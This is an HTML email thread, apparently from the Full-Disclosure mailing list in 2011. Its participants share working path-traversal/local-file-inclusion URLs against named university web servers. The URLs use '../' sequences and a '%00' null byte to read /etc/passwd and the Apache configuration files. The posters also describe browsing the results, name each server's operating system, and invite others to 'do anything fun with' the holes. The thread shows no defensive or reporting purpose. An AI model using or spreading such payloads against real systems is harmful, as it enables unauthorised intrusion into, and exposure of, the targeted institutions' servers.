Also Madhur how did you manage to find the /etc/passwd file? Whats ur techneek?<div><br></div><div>Thx</div><div><br></div><div>Benji</div><div>IRC AND SILC USER - CEH </div><div><br><div class="gmail_quote">On Sat, Feb 19, 2011 at 4:05 PM, Benji <span dir="ltr"><<a href="mailto:me@b3nji.com">me@b3nji.com</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">rabble rabble rablle check out my pjear leet php auditing skills while advertising website rah rah rah<div><br></div><div>
Benji</div><div>Administrator - <a href="http://mostof.ac.uk" target="_blank">http://mostof.ac.uk</a><div><div></div><div class="h5"><br><br><div class="gmail_quote">
On Sat, Feb 19, 2011 at 4:03 PM, Hack Talk <span dir="ltr"><<a href="mailto:hacktalkblog@gmail.com" target="_blank">hacktalkblog@gmail.com</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">
Yea I was poking around the passwd file too. Looks like excel.ucf is running Debian while chemistry.cos.ucf is running CentOS.<div><br><br clear="all">Luis Santana - Security+<br>Administrator - <a href="http://hacktalk.net" target="_blank">http://hacktalk.net</a><br>
HackTalk Security - Security From The Underground<br><br>
<br><br></div><div><div></div><div><div class="gmail_quote">On Sat, Feb 19, 2011 at 6:04 AM, Madhur Ahuja <span dir="ltr"><<a href="mailto:ahuja.madhur@gmail.com" target="_blank">ahuja.madhur@gmail.com</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="margin:0pt 0pt 0pt 0.8ex;border-left:1px solid rgb(204, 204, 204);padding-left:1ex">
<a href="http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00" target="_blank">http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00</a><br>
<br><div class="gmail_quote"><div><div></div><div>On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk <span dir="ltr"><<a href="mailto:hacktalkblog@gmail.com" target="_blank">hacktalkblog@gmail.com</a>></span> wrote:<br>
</div></div><blockquote class="gmail_quote" style="margin:0pt 0pt 0pt 0.8ex;border-left:1px solid rgb(204, 204, 204);padding-left:1ex"><div><div></div><div>
Found these and thought I'd share:<br><br>-==================-<br><a href="http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00" target="_blank">http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00</a><br>
<a href="http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00" target="_blank">http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00</a><br>
-==================-<br>Let me know if you do anything fun with 'em<br><br clear="all">Luis Santana - Security+<br>Administrator - <a href="http://hacktalk.net" target="_blank">http://hacktalk.net</a><br>HackTalk Security - Security From The Underground<br>
<br>
<br></div></div>_______________________________________________<br>
Full-Disclosure - We believe in it.<br>
Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br>
</blockquote></div><br>
</div></div><br>_______________________________________________<br>
Full-Disclosure - We believe in it.<br>
Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br></div></div></div>
</blockquote></div><br></div>